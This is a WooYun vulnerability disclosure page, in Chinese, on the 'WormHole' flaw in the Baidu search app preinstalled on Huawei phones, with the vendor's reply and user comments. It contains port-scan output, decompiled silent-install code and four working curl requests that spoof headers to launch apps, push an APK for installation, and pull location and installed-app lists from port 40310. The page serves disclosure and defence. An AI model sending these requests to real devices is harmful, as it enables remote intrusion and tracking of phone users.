当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148572

漏洞标题:WormHole虫洞漏洞之华为手机可远程安装恶意代码

相关厂商:华为技术有限公司

漏洞作者: 瘦蛟舞

提交时间:2015-10-22 10:50

修复时间:2016-01-21 16:00

公开时间:2016-01-21 16:00

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

刷分啦,良心厂商还是报送下

详细说明:

在对蜂窝网络进行WormHole漏洞探测的时候发现了一个奇怪的东西混入

Discovered open port 40310/tcp on 10.142.2.189 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.14 com.baidu.BaiduMap
Discovered open port 40310/tcp on 10.142.2.66 com.baidu.searchbox_huawei  (华为手机预装) 
Discovered open port 40310/tcp on 10.142.2.221 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.52 com.baidu.netdisk
Discovered open port 40310/tcp on 10.142.2.144 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.204 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.60 com.baidu.searchbox
Discovered open port 40310/tcp on 10.142.2.16 com.baidu.tieba


com.baidu.searchbox_huawei
这个名字听着就像华为手机预装的手机百度应用,还记得之前分析的

public void b(String arg7, Context arg8) {
        PackageInfo v0 = com.baidu.hello.patch.moplus.systemmonitor.util.a.b(arg8, arg8.getPackageName());
        if(v0 != null) {
            if((v0.applicationInfo.flags & 1) == 1) {
                if(b.a(this.b, "android.permission.INSTALL_PACKAGES") != 0) {
                    File v3 = new File(arg7);
                    if(this.a()) {
                        new c(this, "SystemMonitor_InstallAPKByPackageInstaller", v3, arg8, arg7).start();
                    }
                    else {
                        this.a(Uri.fromFile(v3), new SilentPackageInstallObserver(arg8, arg7), 0, arg8
                                .getPackageName());
                    }
                }
            }
            else if(com.baidu.hello.patch.moplus.a.b.a(arg8).a()) {
                com.baidu.hello.patch.moplus.a.b.a(arg8).a("pm install -r \'" + arg7 + "\'\n");
            }
            else {
                Intent v0_1 = new Intent("android.intent.action.VIEW");
                v0_1.setDataAndType(Uri.fromFile(new File(arg7)), "application/vnd.android.package-archive");
                v0_1.setFlags(1342177280);
                arg8.startActivity(v0_1);
            }
        }
    }


三个判断:
1.手机助手为系统应用直接使用android.permission.INSTALL_PACKAGES权限静默安装应用
2.手机助手获得 root 权限后使用 su 后执行 pm install 静默安装应用
3.非以上二种情况则弹出引用安装的确认框
如果这里预装为系统应用那么就可以通过分支1远程静默安装应用啦.找了一台华为手机验证猜想

» adb shell pm list package -f |grep -i baidu
package:/system/app/BaiduInput_for_Huawei.apk=com.baidu.input_huawei
package:/data/dataapp/BaiduSearch.apk=com.baidu.searchbox_huawei


原来还预装了两个百度应用,一个百度输入法,一个手机百度.其中百度输入法为系统应用.将两个应用提取出来分析.
发现输入法虽然包名是百度的可是在系统界面确是显示是华为输入法,到这里差不多猜出了其中的关系.百度提供了输入法的代码给华为自己精简了下纳入了系统应用.作为交换条件华为预装了手机百度给百度做下推广.
分析代码后发现作为攻击价值比较高的系统应用输入法把百度有漏洞的 sdk 给阉割掉了..所以只能对预装的手机百度进行攻击,只有手机百度有被用户启用过在后台的服务便会一直存在,用户就有受到攻击的风险,开始碰巧扫到的华为手机便是这一出.

漏洞证明:

远程启动应用
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent%3A%23Intent%3Bcomponent%3Dorg.wooyun.wifikey%2forg.wooyun.wifikey.MainActivity%3Bend%3B&
远程上传提示安装应用
curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/uploadfile?install_type=all&callback=123&mcmdf=inapp_123&Filename=1.apk&
远程获取坐标
curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/geolocation?callback=123&mcmdf=inapp_123&
远程获取应用列表
curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/getapplist?callback=123&mcmdf=inapp_123&

修复方案:

版权声明:转载请注明来源 瘦蛟舞@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-23 15:56

厂商回复:

感谢白帽子对华为公司安全的关注,我们已经将该漏洞通知了业务部门。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-10-22 14:43 | 慢慢 ( 普通白帽子 | Rank:773 漏洞数:201 | 低调求发展)

    mark

  2. 2015-10-22 14:47 | xsser 认证白帽子 ( 普通白帽子 | Rank:267 漏洞数:20 | 当我又回首一切,这个世界会好吗?)

    这么说真可以做蠕虫啊

  3. 2015-10-22 15:23 | Nicky ( 普通白帽子 | Rank:493 漏洞数:71 | http://www.droidsec.cn 安卓安全中文站)

    厉害啊看来不止一个厂商

  4. 2015-10-22 15:52 | Me_Fortune ( 普通白帽子 | Rank:270 漏洞数:88 | The quiter you are,the more you're able ...)

    mark

  5. 2015-10-22 17:40 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:372 漏洞数:117 | 妈妈,我要上电视)

    接下来请欣赏:WormHole虫洞漏洞之魅族手机可远程安装恶意代码WormHole虫洞漏洞之小米手机可远程安装恶意代码WormHole虫洞漏洞之锤子手机可远程安装恶意代码WormHole虫洞漏洞之酷派手机可远程安装恶意代码WormHole虫洞漏洞之谷歌手机可远程安装恶意代码WormHole虫洞漏洞之金立手机可远程安装恶意代码WormHole虫洞漏洞之HTC手机可远程安装恶意代码WormHole虫洞漏洞之天语手机可远程安装恶意代码WormHole虫洞漏洞之三星手机可远程安装恶意代码WormHole虫洞漏洞之步步高手机可远程安装恶意代码WormHole虫洞漏洞之联想手机可远程安装恶意代码WormHole虫洞漏洞之乐视手机可远程安装恶意代码WormHole虫洞漏洞之OPPO手机可远程安装恶意代码WormHole虫洞漏洞之中兴手机可远程安装恶意代码……………………………………………………

  6. 2015-10-22 23:39 | 薄雾 ( 路人 | Rank:10 漏洞数:2 | 喜欢交友。喜欢动脑。)

    先mark

  7. 2015-10-27 18:00 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)

    mark

  8. 2015-10-28 13:55 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    这个漏洞不置顶不加打雷不给$你们自己有不有阅读自己的条款阿?

  9. 2015-10-28 13:56 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    卧槽。。 是华为的 那就算了 眼瞎了

  10. 2015-10-28 17:57 | shita ( 路人 | Rank:0 漏洞数:1 | 要介绍么?)

    因为内置了百度输入法?

  11. 2015-10-28 19:00 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    为啥

  12. 2015-10-29 09:58 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    哎,刚买了一个华为手机

  13. 2015-10-29 10:08 | china_tc ( 路人 | Rank:4 漏洞数:1 | 今天没吃药 感觉萌!萌!哒..)

    唉 怪不得

  14. 2015-10-29 20:29 | 蓝颜 ( 实习白帽子 | Rank:42 漏洞数:29 )

    接下来请欣赏: WormHole虫洞漏洞之魅族手机可远程安装恶意代码 WormHole虫洞漏洞之小米手机可远程安装恶意代码 WormHole虫洞漏洞之锤子手机可远程安装恶意代码 WormHole虫洞漏洞之酷派手机可远程安装恶意代码 WormHole虫洞漏洞之谷歌手机可远程安装恶意代码 WormHole虫洞漏洞之金立手机可远程安装恶意代码 WormHole虫洞漏洞之HTC手机可远程安装恶意代码 WormHole虫洞漏洞之天语手机可远程安装恶意代码 WormHole虫洞漏洞之三星手机可远程安装恶意代码 WormHole虫洞漏洞之步步高手机可远程安装恶意代码 WormHole虫洞漏洞之联想手机可远程安装恶意代码 WormHole虫洞漏洞之乐视手机可远程安装恶意代码 WormHole虫洞漏洞之OPPO手机可远程安装恶意代码 WormHole虫洞漏洞之中兴手机可远程安装恶意代码

  15. 2015-10-31 10:51 | Fire ant ( 实习白帽子 | Rank:93 漏洞数:31 | 他们回来了................)

    我想起了B站的一个视频小袁搜题内置了三个SB

  16. 2015-11-01 22:41 | Sakura丶小樱 ( 路人 | Rank:4 漏洞数:2 | poi?)

    接下来请欣赏: WormHole虫洞漏洞之魅族手机可远程安装恶意代码 WormHole虫洞漏洞之小米手机可远程安装恶意代码 WormHole虫洞漏洞之锤子手机可远程安装恶意代码 WormHole虫洞漏洞之酷派手机可远程安装恶意代码 WormHole虫洞漏洞之谷歌手机可远程安装恶意代码 WormHole虫洞漏洞之金立手机可远程安装恶意代码 WormHole虫洞漏洞之HTC手机可远程安装恶意代码 WormHole虫洞漏洞之天语手机可远程安装恶意代码 WormHole虫洞漏洞之三星手机可远程安装恶意代码 WormHole虫洞漏洞之步步高手机可远程安装恶意代码 WormHole虫洞漏洞之联想手机可远程安装恶意代码 WormHole虫洞漏洞之乐视手机可远程安装恶意代码 WormHole虫洞漏洞之OPPO手机可远程安装恶意代码 WormHole虫洞漏洞之中兴手机可远程安装恶意代码

  17. 2015-11-02 21:39 | 不悔梦归处 ( 路人 | Rank:0 漏洞数:1 | 不悔梦归处,只恨太匆匆)

    MARK